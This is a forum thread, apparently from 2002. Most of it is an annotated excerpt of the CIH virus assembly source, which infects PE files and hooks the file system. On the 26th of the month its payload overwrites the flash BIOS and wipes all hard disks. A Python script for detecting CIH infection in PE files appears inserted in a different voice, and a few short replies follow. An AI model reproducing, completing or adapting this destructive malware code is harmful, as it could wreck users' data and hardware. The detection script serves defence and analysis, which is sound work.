;读块表到esi(@9处) ; *************************** ; * Full Modify the Bug : * ; * WinZip Self-Extractor * ; * Occurs Error... * ; *************************** ; * So When User Opens * ; * WinZip Self-Extractor, * ; * Virus Doesn\'t Infect it.* ; *************************** ; * First, Virus Gets the * ; * PointerToRawData in the * ; * Second Section Table, * ; * Reads the Section Data, * ; * and Tests the String of * ; * \'WinZip(R)\'...... 
* ; *************************** xchg eax, ebp push 00000004h pop ecx ;读4字节 push edx mov edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx] ;edx为第二块的偏移(.rdata) add edx, 12h ;加10h+2h(10h处为\"WinZip....\") call edi ; VXDCall IFSMgr_Ring0_FileIO ;读4字节到esi ; cmp [esi], \'nZip\' cmp dword ptr [esi], \'piZn\' ;判断是否是WinZip自解压文件 je NotSetInfectedMark ;是就不设置感染标志 pop edx ;edx指向块表在文件中首址 ; *************************** ; * Let\'s Set Total Virus * ; * Code Section Table * ; *************************** ; EBX = My Virus First Section Code ; Size of Following Section Table pop ebx ; 未用空间大小 pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl pop ecx ; ECX = NumberOfSections+1 push edi ; Size add edx, ebp ; ebp为块表大小 push edx ; Pointer of File ;指向块表后(第一块) add ebp, esi ; ebp指向病毒数据区的块表后(第一块) push ebp ; Address of Buffer ; *************************** ; * Set the First Virus * ; * Code Section Size in * ; * VirusCodeSectionTable * ; *************************** lea eax, [ebp+edi-04h] mov [eax], ebx ;设置病毒代码第一块的大小(未用空间大小)到病毒块表 ; *************************** ; * Let\'s Set My Virus * ; * First Section Code * ; *************************** push ebx ; Size ;病毒代码第一块的大小(未用空间大小) add edx, edi push edx ; Pointer of File ;指向块表后(第一块)+Size??=病毒正文(病毒开始处) lea edi, (MyVirusStart-@9)[esi] push edi ; Address of Buffer ;指向病毒开始处 ; *************************** ; * Let\'s Modify the * ; * AddressOfEntryPoint to * ; * My Virus Entry Point * ; *************************** mov (NewAddressOfEntryPoint-@9)[esi], edx ;保存新的程序入口(病毒正文) ; *************************** ; * Setup Initial Data * ; *************************** lea edx, [esi-SizeOfScetionTable] ;edx先减一项块表长度,以配合下面的\"助标1\" mov ebp, offset VirusSize ;ebp为病毒长度 jmp StartToWriteCodeToSections ; *************************** ; * Write Code to Sections * ; *************************** LoopOfWriteCodeToSections: add edx, SizeOfScetionTable ;助标1: ;指向下一块表项 mov ebx, (SizeOfRawData-@9)[edx] ;ebx为该块表项的SizeOfRawData(块大小) sub ebx, (VirtualSize-@9)[edx] ;减去VirtualSize=该块未用空间 jbe 
EndOfWriteCodeToSections push ebx ; Size sub eax, 08h mov [eax], ebx ;写入病毒块表 mov ebx, (PointerToRawData-@9)[edx] ;ebx为块的物理(实际)偏移? add ebx, (VirtualSize-@9)[edx] ;加上VirtualSize push ebx ; Pointer of File ;ebx指向该块未用空间的文件指针 push edi ; Address of Buffer mov ebx, (VirtualSize-@9)[edx] add ebx, (VirtualAddress-@9)[edx] add ebx, (ImageBase-@9)[esi] ;ebx为该块装入后的实际地址 mov [eax+4], ebx ;保存到病毒块表中 mov ebx, [eax] ;该块未用空间大小 add (VirtualSize-@9)[edx], ebx ;加到该块表项的VirtualSize ; Section contains initialized data ==> 00000040h ; Section can be Read. ==> 40000000h or (Characteristics-@9)[edx], 40000040h ;改该块表项的块属性(改为可读,并包含初始化数据) StartToWriteCodeToSections: sub ebp, ebx ;病毒大小-病毒块大小 jbe SetVirusCodeSectionTableEndMark ;如果小于(病毒插入完毕)就设置病毒块表结束符 add edi, ebx ; Move Address of Buffer ;指向病毒下一块 EndOfWriteCodeToSections: loop LoopOfWriteCodeToSections ; *************************** ; * Only Set Infected Mark * ; *************************** OnlySetInfectedMark: mov esp, dr1 ;只设置感染标志 jmp WriteVirusCodeToFile ;跳到写病毒到要传染的文件的程序 ; *************************** ; * Not Set Infected Mark * ; *************************** NotSetInfectedMark: add esp, 3ch ;不设置感染标志 jmp CloseFile ;跳到关文件 ; *************************** ; * Set Virus Code * ; * Section Table End Mark * ; *************************** SetVirusCodeSectionTableEndMark: ; Adjust Size of Virus Section Code to Correct Value add [eax], ebp ;更正病毒块表的最后一项 add [esp+08h], ebp ; Set End Mark xor ebx, ebx mov [eax-04h], ebx ;设置块表结束标志 ; *************************** ; * When VirusGame Calls * ; * VxDCall, VMM Modifies * ; * the \'int 20h\' and the * ; * \'Service Identifier\' * ; * to \'Call [XXXXXXXX]\'. * ; *************************** ; * Before Writing My Virus * ; * to File, I Must Restore * ; * them First. 
^__^ * ; *************************** lea eax, (LastVxDCallAddress-2-@9)[esi] ;上一个调用VXD的指令的地址 mov cl, VxDCallTableSize ;所用VXD调用的个数 LoopOfRestoreVxDCallID: mov word ptr [eax], 20cdh ;还原成\"int 20h\"的形式 mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] ;从VxDCallIDTable取出VXD调用的id号放到edx mov [eax+2], edx ;放到\"int 20h\"的后面,形成\'int 20h\' and the \'Service Identifier\'的形式 movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] ;VxDCallAddressTable中放着各个调用VXD的指令的地址之差 sub eax, edx ;eax为上一个调用地址 loop LoopOfRestoreVxDCallID ;还原其他的调用 ; *************************** ; * Let\'s Write * ; * Virus Code to the File * ; *************************** WriteVirusCodeToFile: mov eax, dr1 ;dr1为前面所保存的esp mov ebx, [eax+10h] ;ebx为保存在栈中的保存文件句柄 mov edi, [eax] ;edi为保存在栈中的IFSMgr_Ring0_FileIO调用的地址 LoopOfWriteVirusCodeToFile: pop ecx ;病毒代码各段的偏移 jecxz SetFileModificationMark ;到病毒偏移零为止 mov esi, ecx mov eax, 0d601h ;写文件功能号(R0_WRITEFILE) pop edx ;文件指针 pop ecx ;要写的字节数 call edi ; VXDCall IFSMgr_Ring0_FileIO ;写文件 ;依次写入:各段病毒代码,病毒块表,新的文件块表,新的程序入口,感染标志 jmp LoopOfWriteVirusCodeToFile ; *************************** ; * Let\'s Set CF = 1 ==> * ; * Need to Restore File * ; * Modification Time * ; *************************** SetFileModificationMark: pop ebx pop eax stc ; Enable CF(Carry Flag) ;设置进位标志 pushf ;标志位压栈 ; ************************************* ; * Close File * ; ************************************* CloseFile: xor eax, eax mov ah, 0d7h ;关闭文件功能号 call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Need to Restore File Modification * ; * Time !? 
* ; ************************************* popf pop esi jnc IsKillComputer ;CF=0就KillComputer :-( ; ************************************* ; * Restore File Modification Time * ; ************************************* mov ebx, edi mov ax, 4303h mov ecx, (FileModificationTime-@7)[esi] mov edi, (FileModificationTime+2-@7)[esi] call ebx ; VXDCall IFSMgr_Ring0_FileIO ;修改文件修改时间 ; ************************************* ; * Disable OnBusy * ; ************************************* DisableOnBusy: dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus ; ************************************* ; * Call Previous FileSystemApiHook * ; ************************************* prevhook: popad ;恢复所有寄存器 mov eax, dr0 ; 保存的原来的文件系统钩子程序首址 jmp [eax] ; Jump to prevhook ;跳到前一个钩子去执行 ; ************************************* ; * Call the Function that the IFS * ; * Manager Would Normally Call to * ; * Implement this Particular I/O * ; * Request. * ; ************************************* pIFSFunc: ; FileSystemApiHookFunction的参数见助标2 mov ebx, esp ; ebx指向esp以获得FileSystemApiHookFunction的参数地址 push dword ptr [ebx+20h+04h+14h] ; Push pioreq ;把参数pioreq pir压栈(ebx+20h+04h为参数首址) call [ebx+20h+04h] ; Call pIFSFunc ;调用pIFSFunc FSDFnAddr(FSD的功能地址) pop ecx ; mov [ebx+1ch], eax ; Modify EAX Value in Stack ;改eax的值(在栈中,20h为pushad的压栈大小,1ch为第一个压栈的eax) ; *************************** ; * After Calling pIFSFunc, * ; * Get Some Data from the * ; * Returned pioreq. * ; *************************** cmp dword ptr [ebx+20h+04h+04h], 00000024h ;详见助标2 jne QuitMyVirusFileSystemHook ; ***************** ; * Get the File * ; * Modification * ; * Date and Time * ; * in DOS Format.* ; ***************** mov eax, [ecx+28h] mov (FileModificationTime-@6)[esi], eax ;保存获得的文件时间和日期 ; *************************** ; * Quit My Virus\' * ; * IFSMgr_FileSystemHook * ; *************************** QuitMyVirusFileSystemHook: popad ;恢复所有寄存器 ret ;从病毒设置的文件钩子程序中退出 ; ************************************* ; * Kill Computer !? ... 
*^_^* * ;KillComputer模块(!!十分危险,所以原理分析及详细注释暂不公布!!) ; ************************************* IsKillComputer: ; Get Now Day from BIOS CMOS mov al, 07h out 70h, al in al, 71h xor al, 26h ; ??/26/???? ;从CMOS中获得当前的日期 IF DEBUG jmp DisableOnBusy ELSE jnz DisableOnBusy ENDIF ;如果是每月的26号就KillComputer(太危险了).*^_^*. ; ************************************** ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; ************************************** ; *************************** ; * Kill BIOS EEPROM * ; *************************** mov bp, 0cf8h lea esi, IOForEEPROM-@7[esi] ; *********************** ; * Show BIOS Page in * ; * 000E0000 - 000EFFFF * ; * ( 64 KB ) * ; *********************** mov edi, 8000384ch mov dx, 0cfeh cli call esi ; *********************** ; * Show BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** mov di, 0058h dec edx ; and a0fh mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h call esi ; *********************** ; * Show the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E01FF * ; * ( 512 Bytes ) * ; * , and the Section * ; * of Extra BIOS can * ; * be Writted... 
* ; *********************** lea ebx, EnableEEPROMToWrite-@10[esi] mov eax, 0e5555h mov ecx, 0e2aaah call ebx mov byte ptr [eax], 60h push ecx loop $ ; *********************** ; * Kill the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E007F * ; * ( 80h Bytes ) * ; *********************** xor ah, ah mov [eax], al xchg ecx, eax loop $ ; *********************** ; * Show and Enable the * ; * BIOS Main ROM Data * ; * 000E0000 - 000FFFFF * ; * ( 128 KB ) * ; * can be Writted... * ; *********************** mov eax, 0f5555h pop ecx mov ch, 0aah call ebx mov byte ptr [eax], 20h loop $ ; *********************** ; * Kill the BIOS Main * ; * ROM Data in Memory * ; * 000FE000 - 000FE07F * ; * ( 80h Bytes ) * ; *********************** mov ah, 0e0h mov [eax], al ; *********************** ; * Hide BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** ; or al 0h mov word ptr (BooleanCalculateCode-@10)[esi], 100ch call esi ; *************************** ; * Kill All HardDisk * ; *************************************************** ; * IOR Structure of IOS_SendCommand Needs * ; *************************************************** ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? 
* ; *************************************************** KillHardDisk: xor ebx, ebx mov bh, FirstKillHardDiskNumber push ebx sub esp, 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h ; VXDCall IOS_SendCommand cmp word ptr [esi+06h], 0017h je KillNextDataSection ChangeNextHardDisk: inc byte ptr [esi+4dh] jmp LoopOfKillHardDisk KillNextDataSection: add dword ptr [esi+10h], ebx mov byte ptr [esi+4dh], FirstKillHardDiskNumber jmp LoopOfKillHardDisk ; *************************** ; * Enable EEPROM to Write * ; *************************** EnableEEPROMToWrite: mov [eax], cl mov [ecx], al mov byte ptr [eax], 80h mov [eax], cl mov [ecx], al ret ; *************************** ; * IO for EEPROM * ; *************************** IOForEEPROM: @10 = IOForEEPROM xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp in al, dx BooleanCalculateCode = $ or al, 44h xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp out dx, al ret ; ********************************************************* ; * Static Data * ; ********************************************************* LastVxDCallAddress = IFSMgr_Ring0_FileIO ;最后一个调用的VxD的指令的地址 VxDCallAddressTable db 00h db IFSMgr_RemoveFileSystemApiHook-_PageAllocate db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook db IFSMgr_Ring0_FileIO-UniToBCSPath ;各个VxD调用指令地址之差 VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;VxD的调用号 VxDCallTableSize = ($-VxDCallIDTable)/04h ;程序中使用VxD调用的个数 ; ********************************************************* ; * Virus Version Copyright * ; ********************************************************* VirusVersionCopyright db \'CIH v\' ;CIH病毒的标识 db MajorVirusVersion+\'0\' ;主版本号 db \'.\' db MinorVirusVersion+\'0\' ;副版本号 db \' TATUNG\' ;作者名字 ; ********************************************************* ; * Virus Size * ; 
********************************************************* VirusSize = $ ; + SizeOfVirusCodeSectionTableEndMark(04h) ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) ; + SizeOfTheFirstVirusCodeSectionTable(04h) ;病毒代码全长 ; ********************************************************* ; * Dynamic Data * ; ********************************************************* VirusGameDataStartAddress = VirusSize @6 = VirusGameDataStartAddress OnBusy db 0 ;忙标志 FileModificationTime dd ? ;文件修改时间 FileNameBuffer db FileNameBufferSize dup(?) ;7fh长的文件名数据区 @7 = FileNameBuffer DataBuffer = $ @8 = DataBuffer NumberOfSections dw ? ; 块数目 TimeDateStamp dd ? ; 文件时间 SymbolsPointer dd ? ; NumberOfSymbols dd ? ; 符号表中符号个数 SizeOfOptionalHeader dw ? ; 可选部首长度 _Characteristics dw ? ; 信息标志 Magic dw ? ; 标志字(总是010bh) LinkerVersion dw ? ; 连接器版本号 SizeOfCode dd ? ; 代码段大小 SizeOfInitializedData dd ? ; 已初始化数据块大小 SizeOfUninitializedData dd ? ; 未初始化数据块大小 AddressOfEntryPoint dd ? ; 程序起始RVA BaseOfCode dd ? ; 代码段起始RVA BaseOfData dd ? ; 数据段起始RVA ImageBase dd ? ; 装入基址RVA @9 = $ SectionAlignment dd ? ; 块对齐 FileAlignment dd ? ; 文件块对齐 OperatingSystemVersion dd ? |
|
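As an added defender-side example (not code from the thread or from the virus author), the following Python script checks a PE file for the three observable side effects of the infection routine posted above: the nonzero byte written just before the "PE\0\0" signature as the infected mark, an AddressOfEntryPoint relocated into the header slack after the section table, and the "CIH v" version string. The sample PE images it scans are constructed inside the script; field offsets follow the standard PE32 header layout.

```python
import struct

PE_SIG = b"PE\0\0"
COFF_HEADER_SIZE = 20      # IMAGE_FILE_HEADER, after the 4-byte signature
SECTION_HEADER_SIZE = 40   # IMAGE_SECTION_HEADER
VERSION_MARKER = b"CIH v"  # VirusVersionCopyright string from the posted source


def parse_pe(data: bytes) -> dict:
    """Minimal PE32 header parser returning only the fields the heuristics need."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_SIG:
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    number_of_sections = struct.unpack_from("<H", data, coff + 2)[0]   # PE+06h, as in the source
    size_of_optional_header = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + COFF_HEADER_SIZE
    entry = struct.unpack_from("<I", data, opt + 16)[0]               # AddressOfEntryPoint
    size_of_headers = struct.unpack_from("<I", data, opt + 60)[0]
    section_table = opt + size_of_optional_header
    sections = []
    for i in range(number_of_sections):
        off = section_table + i * SECTION_HEADER_SIZE
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"virtual_size": vsize, "virtual_address": vaddr,
                         "size_of_raw_data": rawsize, "pointer_to_raw_data": rawptr})
    return {"e_lfanew": e_lfanew, "entry": entry, "size_of_headers": size_of_headers,
            "section_table_end": section_table + number_of_sections * SECTION_HEADER_SIZE,
            "sections": sections}


def cih_indicators(data: bytes) -> list:
    """Return the list of CIH-style infection indicators found in a PE image."""
    pe = parse_pe(data)
    findings = []
    # (1) The virus compares the dword at e_lfanew-1 with 00455000h ("\0PE\0") and,
    #     when it infects, writes one byte at that position. A clean file has 0 there.
    if data[pe["e_lfanew"] - 1] != 0:
        findings.append("nonzero byte before PE signature")
    # (2) The first virus block is stored in the unused space after the section table
    #     and AddressOfEntryPoint is pointed at that file offset. Headers map at RVA 0,
    #     so an entry RVA below SizeOfHeaders and below every section is outside all code.
    first_section_rva = min((s["virtual_address"] for s in pe["sections"]),
                            default=pe["size_of_headers"])
    if pe["section_table_end"] <= pe["entry"] < min(pe["size_of_headers"], first_section_rva):
        findings.append("entry point inside header slack")
    # (3) Plain string signature; the weakest of the three indicators.
    if VERSION_MARKER in data:
        findings.append("CIH version string present")
    return findings


def build_sample_pe(infected: bool) -> bytes:
    """Constructed minimal PE32 image with one .text section (not a real binary)."""
    e_lfanew, size_of_headers = 0x80, 0x200
    hdr = bytearray(size_of_headers)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = PE_SIG
    coff = e_lfanew + 4
    # Machine, NumberOfSections, TimeDateStamp, PtrToSymbols, NumSymbols, SizeOfOptHdr, Characteristics
    struct.pack_into("<HHIIIHH", hdr, coff, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = coff + COFF_HEADER_SIZE
    struct.pack_into("<H", hdr, opt, 0x10B)               # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x1000)         # entry inside .text
    struct.pack_into("<I", hdr, opt + 28, 0x400000)       # ImageBase
    struct.pack_into("<II", hdr, opt + 32, 0x1000, 0x200) # Section/File alignment
    struct.pack_into("<II", hdr, opt + 56, 0x2000, size_of_headers)
    sect = opt + 0xE0
    hdr[sect:sect + 8] = b".text\0\0\0"
    struct.pack_into("<IIII", hdr, sect + 8, 0x100, 0x1000, 0x200, 0x200)
    struct.pack_into("<I", hdr, sect + 36, 0x60000020)
    body = bytearray(0x200)                               # raw .text data, all zeros
    if infected:
        hdr[e_lfanew - 1] = 0x01                          # infection mark byte
        # entry after the section table plus (NumberOfSections+1) 8-byte virus table entries
        struct.pack_into("<I", hdr, opt + 16, sect + SECTION_HEADER_SIZE + 2 * 8)
        body[0x100:0x100 + 9] = VERSION_MARKER + b"0.0 "    # constructed marker in section slack
    return bytes(hdr) + bytes(body)
```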
Post #17
Posted on: 2002-05-31 19:52
Unfinished and will not be continued; the site admin has expressly forbidden distributing the complete virus code.
[Edited - 5/31/02 by asmsys] |
|
Post #18
Posted on: 2002-06-22 19:35
I heard funlove was written in VB.
Is this disassembled?? |
|
Post #19
Posted on: 2002-06-24 08:48
I heard funlove was written in VB. It was written in assembly. Does this code look disassembled to you??? |
|
|